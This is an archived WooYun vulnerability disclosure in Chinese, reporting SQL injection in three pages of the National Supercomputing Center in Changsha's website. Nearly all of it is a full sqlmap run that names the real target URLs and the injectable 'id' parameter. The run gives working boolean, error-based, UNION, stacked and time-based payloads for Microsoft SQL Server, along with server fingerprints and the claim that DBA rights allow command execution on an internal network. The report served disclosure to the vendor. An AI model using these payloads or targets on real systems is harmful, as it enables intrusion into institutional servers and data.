乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-17: 细节已通知厂商并且等待厂商处理中 2016-01-18: 厂商已经确认,细节仅向厂商公开 2016-01-28: 细节向核心白帽子及相关领域专家公开 2016-02-07: 细节向普通白帽子公开 2016-02-17: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
国家超级计算机某中心存在多处漏洞(可getshell)(可内网漫游)
国家超级计算沙中心2010年10月由科技部批准组建,成为继天津和深圳之后获批建设的第三家国家级超级计算中心。 2010年11月28日,以“天河一号”为计算设备的国家超级计算长沙中心在湖南大学正式奠基 。2014年11月04日,国家超级计算长沙中心在湖南大学正式运营。“国家超级计算长沙中心”是经科技部批准的信息化建设重大项目。国家超级计算长沙中心选址湖南大学校区内,采用国防科技大学“天河一号”高性能计算机,按每秒1000万亿次运算能力规划建设,总投资7.2亿元。偶然浏览到国家超级计算机长沙中心 http://nscc.hnu.edu.cn/检测之:http://nscc.hnu.edu.cn/Article_NoticeList.aspx?id=13 http://nscc.hnu.edu.cn/Article_NewsList.aspx?id=14 http://nscc.hnu.edu.cn/Article_ApplyList.aspx?id=4 三处存在SQL注入【1】sqlmap截图:
【2】DBA权限直接可以执行命令,服务器在内网
【3】数据库信息:
疑似项目信息数据库
未深入
sqlmap全过程
[18:09:00] [INFO] testing connection to the target URL[18:09:01] [INFO] testing if the target URL is stable. This can take a couple of seconds[18:09:02] [INFO] target URL is stable[18:09:02] [INFO] testing if GET parameter 'id' is dynamic[18:09:02] [INFO] confirming that GET parameter 'id' is dynamic[18:09:03] [INFO] GET parameter 'id' is dynamic[18:09:03] [INFO] heuristic (basic) test shows that GET parameter 'id' might beinjectable (possible DBMS: 'Microsoft SQL Server')[18:09:03] [INFO] testing for SQL injection on GET parameter 'id'heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n]do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n][18:09:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[18:09:31] [WARNING] reflective value(s) found and filtering out[18:09:32] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable[18:09:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[18:09:32] [INFO] GET parameter 'id' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable[18:09:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[18:09:33] [INFO] GET parameter 'id' is 'Microsoft SQL Server/Sybase inline queries' injectable[18:09:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[18:09:33] [WARNING] time-based comparison requires larger statistical model, please wait..................[18:09:48] [INFO] GET parameter 'id' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable[18:09:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[18:09:59] [INFO] GET parameter 'id' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable[18:09:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[18:09:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[18:10:04] [INFO] target URL appears to be UNION injectable with 11 columns[18:10:06] [WARNING] combined UNION/error-based SQL injection case found on column 2. sqlmap will try to find another column with better characteristics[18:10:07] [WARNING] combined UNION/error-based SQL injection case found on column 1. sqlmap will try to find another column with better characteristics[18:10:07] [WARNING] combined UNION/error-based SQL injection case found on column 11. sqlmap will try to find another column with better characteristics[18:10:08] [WARNING] combined UNION/error-based SQL injection case found on column 9. sqlmap will try to find another column with better characteristics[18:10:08] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectableGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 66 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=14 AND 5278=5278 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=14 AND 2616=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2616=2616) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=14 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(83)+CHAR(65)+CHAR(102)+CHAR(99)+CHAR(108)+CHAR(104)+CHAR(80)+CHAR(110)+CHAR(74)+CHAR(112)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(113),NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=14 ; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=14 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3942=3942) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(113))---[18:10:23] [INFO] testing Microsoft SQL Server[18:10:24] [INFO] confirming Microsoft SQL Server[18:10:25] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005
危害等级:中
漏洞Rank:5
确认时间:2016-01-18 09:02
确认并尽快修复
暂无